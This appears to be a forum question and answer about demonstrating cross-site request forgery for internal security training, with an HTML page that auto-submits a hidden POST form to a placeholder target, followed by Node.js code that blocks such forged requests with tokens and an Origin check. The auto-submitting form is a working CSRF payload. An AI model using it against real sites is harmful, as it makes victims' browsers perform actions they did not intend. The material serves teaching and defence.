I'm doing an introduction to web security for some other people in our enterprise, and I want to show some examples to have more impact.
For this I've created a
On the "other host" (the attacker) you just create a FORM with method POST whose action (i.e. where the form is submitted) is your vulnerable app. Then you submit it with JavaScript on that page.
Like this:
<html><body>
<form name="csrf_form" action="http://VULNERABLE_APP/csrf.php" method="POST">
<input type="hidden" name="csrf_param" value="POST_ATTACK">
</form>
<script type="text/javascript">document.csrf_form.submit();</script>
</body></html>
This will submit a POST to your vulnerable app from the attacker's host when you open that page.
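
The forged POST in the answer above is accepted because the receiving script cannot tell it from a form the application served itself. As an added example (not part of the original answer, and not the vulnerable app's code), here is a Node.js server-side check that rejects it; the origin value, the csrf_token field name and the request/session object shapes are assumptions made for illustration.

```javascript
const crypto = require("node:crypto");

// Hypothetical placeholder for the app's own origin (VULNERABLE_APP in the form).
const APP_ORIGIN = "http://vulnerable-app.example";

// Issue a random per-session token. The app embeds it as a hidden field in the
// forms it serves; a page on another origin cannot read it.
function issueCsrfToken(session) {
  session.csrfToken = crypto.randomBytes(32).toString("hex");
  return session.csrfToken;
}

// Constant-time comparison that also handles a missing or wrong-length token.
function tokensMatch(expected, supplied) {
  if (typeof expected !== "string" || typeof supplied !== "string") return false;
  const a = Buffer.from(expected);
  const b = Buffer.from(supplied);
  return a.length === b.length && crypto.timingSafeEqual(a, b);
}

// Decide whether a state-changing POST is accepted.
// req shape (assumed): { method, headers: { origin }, body, session }
function checkPost(req) {
  if (req.method !== "POST") return { ok: false, reason: "method" };
  const origin = req.headers.origin;
  // When the browser sends an Origin header, it must be the app's own origin.
  if (origin !== undefined && origin !== APP_ORIGIN) return { ok: false, reason: "origin" };
  // The token check is the main defence and applies even without Origin.
  if (!tokensMatch(req.session.csrfToken, req.body.csrf_token)) {
    return { ok: false, reason: "token" };
  }
  return { ok: true, reason: null };
}

// Constructed sample requests: the auto-submitted form from the answer, the
// same request with no Origin header, and a form served by the app itself.
function demo() {
  const session = {};
  const token = issueCsrfToken(session);
  const body = { csrf_param: "POST_ATTACK" };
  const forged = { method: "POST", headers: { origin: "http://attacker.example" }, body, session };
  const noOrigin = { method: "POST", headers: {}, body, session };
  const legit = { method: "POST", headers: { origin: APP_ORIGIN },
                  body: { csrf_param: "normal", csrf_token: token }, session };
  return [forged, noOrigin, legit].map((r) => checkPost(r).reason);
}

console.log(demo()); // [ 'origin', 'token', null ]
```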